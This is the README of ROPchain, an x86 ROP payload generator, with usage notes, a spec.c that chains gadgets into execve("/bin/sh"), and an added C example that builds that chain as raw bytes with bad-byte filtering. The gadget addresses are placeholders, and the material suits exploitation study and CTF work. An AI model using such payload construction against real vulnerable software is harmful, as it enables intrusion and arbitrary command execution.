ROPchain is a systematic x86 ROP payload generator. It provides a ROP API library that lets users generate customized payloads from the gadgets found in a target binary. ROPchain is written in C and uses the Capstone disassembly framework.
To use ROPchain, you have to install Capstone first.
After installing Capstone, download ROPchain and build it:
    $ git clone git@github.com:SQLab/ropchain.git
    $ cd ropchain
    $ make

    usage: ropchain <binary_file> [-p <bool>] [-o <offset>] [-b <badbyte>] [-l <length>] [-v <bool>]

    optional arguments:
      -p    Print all gadgets. (default true)
      -o    Add padding (offset) bytes to the payload. (default 0)
      -b    Bypass badbyte gadgets. ex: "00|20|0a"
      -l    Allow maximum gadget length. (default 10)
      -v    Show gadget search verbose output. (default false)

If you want to replace a specific gadget, make good use of the "-b" badbyte argument.
For example, if you don't like the gadget "0x0819a2cd : pop edx; pop ebx; ret", you can add the argument -b "cd" to get another gadget: the filter rejects any gadget whose address contains one of the listed bytes, and 0x0819a2cd has 0xcd as its low byte. Note that this also rejects every other gadget with a 0xcd byte somewhere in its address, so prefer the narrowest byte that excludes the one you want replaced.
Edit spec.c and use the ROP API to generate a customized payload.
The default is execve("/bin/sh"), and you can do more,
e.g. a reverse TCP shell, a bind TCP shell, ...
    #include "spec.h"

    int rop_chain_payload(struct Node *root, struct Gadget *head, struct Arg *arg)
    {
        struct API *api;
        unsigned int data = 0x080efff0;   /* writable scratch address in the target */

        rop_build_api(root, &api, arg);
        printf("\n--- Start chain *execve(\"/bin/sh\")* gadgets ---\n\n");
        rop_chain_list_init(head);

        /* Write "/bin//sh\0" to memory, one little-endian dword at a time. */
        rop_write_memory_gadget(head, api, data, 0x6e69622f);      /* "/bin" */
        rop_write_memory_gadget(head, api, data + 4, 0x68732f2f);  /* "//sh" */
        rop_write_memory_gadget(head, api, data + 8, 0);           /* NUL terminator; also a NULL pointer */

        /* execve(path = ebx, argv = ecx, envp = edx): argv and envp both point at the zero dword. */
        rop_write_register_gadget(api, "ebx", data);
        rop_write_register_gadget(api, "ecx", data + 8);
        rop_write_register_gadget(api, "edx", data + 8);
        rop_chain_write_register_gadget(head, api);

        /* eax = 11 (__NR_execve on 32-bit Linux), then int 0x80. */
        rop_zero_register_gadget(head, api, "eax");
        rop_add_register_gadget(head, api, "eax", 11);
        rop_interrupt_gadget(head, api);

        rop_end_api(api);
        return 0;
    }
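The following is an added example, not ROPchain's own code, that lays out the same execve("/bin//sh") chain spec.c describes as raw little-endian bytes, and applies a "-b"-style bad-byte filter both to gadget addresses (as in the 0x0819a2cd example above) and to the finished chain. Every gadget address in it is a hypothetical placeholder (an assumption; a real run would take them from ropchain's gadget listing), the scratch address is the page's 0x080efff0, and the write primitive assumed is a "mov dword ptr [edx], eax ; ret" gadget fed by "pop edx ; pop ebx ; ret" and "pop eax ; ret".

```c
/* Added example (not ROPchain's code): raw layout of the execve chain from spec.c,
 * plus the "-b" bad-byte filter applied to gadget addresses and to the chain.
 * All gadget addresses are hypothetical placeholders (assumption). */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define G_POP_EAX_RET         0x080b8ab6u  /* pop eax ; ret                     (hypothetical) */
#define G_POP_ECX_RET         0x080e5f91u  /* pop ecx ; ret                     (hypothetical) */
#define G_POP_EDX_POP_EBX_RET 0x0806f4d3u  /* pop edx ; pop ebx ; ret           (hypothetical) */
#define G_MOV_EDX_EAX_RET     0x0807a1e2u  /* mov dword ptr [edx], eax ; ret    (hypothetical) */
#define G_INT_80              0x0806c1f5u  /* int 0x80                          (hypothetical) */
#define JUNK                  0x42424242u  /* filler for a pop whose value we do not need */

struct chain { uint8_t buf[512]; size_t len; };

/* Pack a 4-byte ASCII chunk as the little-endian dword a pop/mov would load. */
uint32_t le_str4(const char *s)
{
    return (uint32_t)(uint8_t)s[0] | (uint32_t)(uint8_t)s[1] << 8 |
           (uint32_t)(uint8_t)s[2] << 16 | (uint32_t)(uint8_t)s[3] << 24;
}

static int emit(struct chain *c, uint32_t v)        /* append one dword; nonzero on overflow */
{
    if (c->len + 4 > sizeof c->buf) return -1;
    for (int i = 0; i < 4; i++) c->buf[c->len++] = (uint8_t)(v >> (8 * i));
    return 0;
}

/* *(uint32_t *)addr = val : edx <- addr (ebx gets junk), eax <- val, mov [edx], eax */
static int write_mem(struct chain *c, uint32_t addr, uint32_t val)
{
    return emit(c, G_POP_EDX_POP_EBX_RET) || emit(c, addr) || emit(c, JUNK) ||
           emit(c, G_POP_EAX_RET) || emit(c, val) || emit(c, G_MOV_EDX_EAX_RET);
}

/* offset bytes of padding (like -o), then the chain; returns total length or -1. */
int build_execve_chain(struct chain *c, size_t offset, uint32_t data)
{
    if (offset > sizeof c->buf) return -1;
    memset(c->buf, 'A', offset);
    c->len = offset;
    if (write_mem(c, data,     le_str4("/bin")) ||   /* 0x6e69622f */
        write_mem(c, data + 4, le_str4("//sh")) ||   /* 0x68732f2f */
        write_mem(c, data + 8, 0))                    /* NUL; also serves as NULL argv/envp */
        return -1;
    if (emit(c, G_POP_ECX_RET) || emit(c, data + 8) ||           /* ecx = argv = NULL */
        emit(c, G_POP_EDX_POP_EBX_RET) || emit(c, data + 8) ||   /* edx = envp = NULL */
        emit(c, data) ||                                         /* ebx = "/bin//sh" */
        emit(c, G_POP_EAX_RET) || emit(c, 11) ||                 /* eax = __NR_execve */
        emit(c, G_INT_80))
        return -1;
    return (int)c->len;
}

static int hexval(char ch)
{
    if (ch >= '0' && ch <= '9') return ch - '0';
    if (ch >= 'a' && ch <= 'f') return ch - 'a' + 10;
    if (ch >= 'A' && ch <= 'F') return ch - 'A' + 10;
    return -1;
}

/* Parse a "-b"-style spec such as "00|20|0a"; returns the byte count or -1 on a malformed spec. */
int parse_badbytes(const char *spec, uint8_t *out, size_t cap)
{
    size_t n = 0;
    for (;;) {
        int hi = hexval(spec[0]), lo = hi < 0 ? -1 : hexval(spec[1]);
        if (lo < 0 || n == cap) return -1;
        out[n++] = (uint8_t)(hi << 4 | lo);
        if (spec[2] == '\0') return (int)n;
        if (spec[2] != '|') return -1;
        spec += 3;
    }
}

/* The filter the page's -b "cd" example implies: reject a gadget whose address contains a bad byte. */
int gadget_allowed(uint32_t addr, const char *spec)
{
    uint8_t bad[16];
    int n = parse_badbytes(spec, bad, sizeof bad);
    if (n < 0) return -1;
    for (int i = 0; i < 4; i++)
        for (int j = 0; j < n; j++)
            if ((uint8_t)(addr >> (8 * i)) == bad[j]) return 0;
    return 1;
}

/* Offset of the first bad byte in the built chain at or after `from`, -1 if none, -2 on a bad spec. */
int first_badbyte(const struct chain *c, size_t from, const char *spec)
{
    uint8_t bad[16];
    int n = parse_badbytes(spec, bad, sizeof bad);
    if (n < 0) return -2;
    for (size_t i = from; i < c->len; i++)
        for (int j = 0; j < n; j++)
            if (c->buf[i] == bad[j]) return (int)i;
    return -1;
}

int main(void)
{
    struct chain c;
    int len = build_execve_chain(&c, 0, 0x080efff0u);
    if (len < 0) return 1;
    printf("chain: %d bytes, first 0x00 at offset %d\n", len, first_badbyte(&c, 0, "00"));
    printf("0x0819a2cd allowed with -b \"cd\": %d\n", gadget_allowed(0x0819a2cdu, "cd"));
    for (int i = 0; i < len; i += 4)
        printf("%3d: %02x %02x %02x %02x\n", i, c.buf[i], c.buf[i + 1], c.buf[i + 2], c.buf[i + 3]);
    return 0;
}
```

Two things worth noticing when running it: the address filter only ever looks at gadget addresses, so the chain still carries null bytes wherever a constant such as the NUL terminator or 0x0000000b is popped from the stack; first_badbyte reports the first of these, which is the check to run before feeding a chain through anything that stops at 0x00. That is also one reason a generator may prefer to zero a register and add to it (as spec.c does for eax) rather than pop the constant directly.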